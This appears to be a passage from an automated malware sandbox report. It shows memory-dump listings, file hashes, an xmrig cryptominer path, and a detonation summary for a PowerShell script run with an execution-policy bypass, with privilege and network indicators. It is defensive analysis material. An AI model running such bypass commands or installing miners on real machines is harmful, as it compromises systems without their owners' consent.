| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-10-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-25-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-48-0x000001BAE1BF0000-0x000001BAE1C02000-memory.dmp
memory/1448-61-0x000001BAE1940000-0x000001BAE194A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4808-90-0x0000017D0A4D0000-0x0000017D0A4F0000-memory.dmp
memory/4808-91-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-92-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/1448-93-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-94-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-95-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/4808-96-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-97-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-98-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-99-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-100-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-101-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-102-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-103-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-104-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-105-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-106-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-107-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-108-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-109-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-110-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-111-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-112-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-113-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-114-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-115-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-116-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-117-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-118-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-119-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-120-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-121-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-122-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-123-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-124-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-125-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-126-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-127-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-128-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-129-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-130-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-131-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-132-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-133-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-134-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-135-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-136-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-137-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-138-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-139-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-140-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-141-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-142-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-143-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-144-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-145-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-146-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-147-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-148-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-149-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-150-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-151-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-152-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-153-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-154-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-155-0x00007FF772B40000-0x00007FF773773000-memory.dmp
memory/4808-156-0x00007FF772B40000-0x00007FF773773000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1741s
Max time network
1751s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.229.43:443 | tcp |
Files
memory/3040-0-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0icrmrz.dys.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3040-10-0x0000014764FD0000-0x0000014764FF2000-memory.dmp
memory/3040-11-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/3040-12-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/3040-13-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/3040-14-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/3040-15-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
memory/3040-16-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/3040-17-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp